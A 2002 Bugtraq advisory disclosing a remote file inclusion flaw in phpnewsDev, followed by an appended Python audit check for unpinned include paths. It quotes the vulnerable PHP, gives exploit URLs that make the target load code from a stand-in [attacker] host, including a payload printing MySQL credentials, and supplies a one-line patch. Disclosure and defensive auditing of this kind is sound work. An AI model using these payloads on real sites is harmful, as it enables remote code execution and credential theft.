[27567] in bugtraq


phpnewsDev

daemon@ATHENA.MIT.EDU (Frog Man)
Tue Oct 22 19:45:48 2002

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 22 Oct 2002 22:17:47 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F14hCo4lkCbYZLVMT43000095dd@hotmail.com>


Information :
°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Problem : bad use of include()

PHP Code :
°°°°°°°°°°
-------Include/variables.php3-------
<?
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage="2000";
$MoisDeDemarrage="8";
$NbNouvelles=5;
require("$Include/french.inc");
?>
-----------------------------------

and Include/lib.inc.php3 :
------------------------------------
include("$Include/config.inc.php3");
------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/variables.php3?Include=http://[attacker]
with, in the file http://[attacker]/french.inc :
<?
print("<center><u>MySQL Infos</u></center>\n\nServeur: $Mac \nLogin: $Uti 
\nPass: $Mot \nDB Name: $Bd");
?>

and

http://[target]/Include/lib.inc.php3?http://[attacker]
with bad PHP code in the file :
http://[attacker]/config.inc.php3


Patch :
°°°°°°°
Add to the beginning of :
----------------------
Include/lib.inc.php3
Include/variables.php3
----------------------

the line :
$Include="Include";



More details in French :
http://www.frog-man.org/tutos/phpnewsDev.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII



frog-m@n
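
Added example, not part of the original post: a small Python audit check for the pattern the advisory describes, an include()/require() path built from a variable that the same file never sets to a string literal before use. The function name, the regexes and the sample strings (shortened excerpts of the two files quoted above) are assumptions made for this illustration.

```python
import re

# One pass over the source, in order: either `$Name = "literal";` (pins the
# variable) or an include/require statement up to its terminating `;`.
# The lookbehind stops `$Include` itself being read as the `include` keyword.
STMT_RE = re.compile(
    r'\$(?P<assign>[A-Za-z_]\w*)\s*=\s*(?P<q>["\'])[^"\'$]*(?P=q)\s*;'
    r'|(?<![$\w])(?:include|require)(?:_once)?\b(?P<expr>[^;]*);',
    re.IGNORECASE,
)
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')
SINGLE_QUOTED = re.compile(r"'[^']*'")  # PHP does not interpolate these


def unpinned_includes(php_source):
    """Return [(line, variable)] for include/require paths that use a variable
    no earlier statement in the same file has set to a string literal.
    Heuristic, file-local check; it does not follow other included files."""
    pinned, findings = set(), []
    for m in STMT_RE.finditer(php_source):
        if m.group("assign"):
            pinned.add(m.group("assign"))
            continue
        line = php_source.count("\n", 0, m.start()) + 1
        expr = SINGLE_QUOTED.sub("''", m.group("expr"))
        for var in VAR_RE.findall(expr):
            if var not in pinned:
                findings.append((line, var))
    return findings


# Constructed samples: shortened excerpts of the two files quoted in the post.
VARIABLES_PHP3 = '<?\n$Bd="phpnews";\n$NbNouvelles=5;\nrequire("$Include/french.inc");\n?>'
LIB_INC_PHP3 = 'include("$Include/config.inc.php3");'
PIN = '$Include="Include";\n'  # the line the post's patch adds

if __name__ == "__main__":
    for name, src in [
        ("variables.php3", VARIABLES_PHP3),
        ("lib.inc.php3", LIB_INC_PHP3),
        ("variables.php3 + patch", VARIABLES_PHP3.replace("<?\n", "<?\n" + PIN, 1)),
        ("lib.inc.php3 + patch", PIN + LIB_INC_PHP3),
    ]:
        print(name, unpinned_includes(src) or "ok")
```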







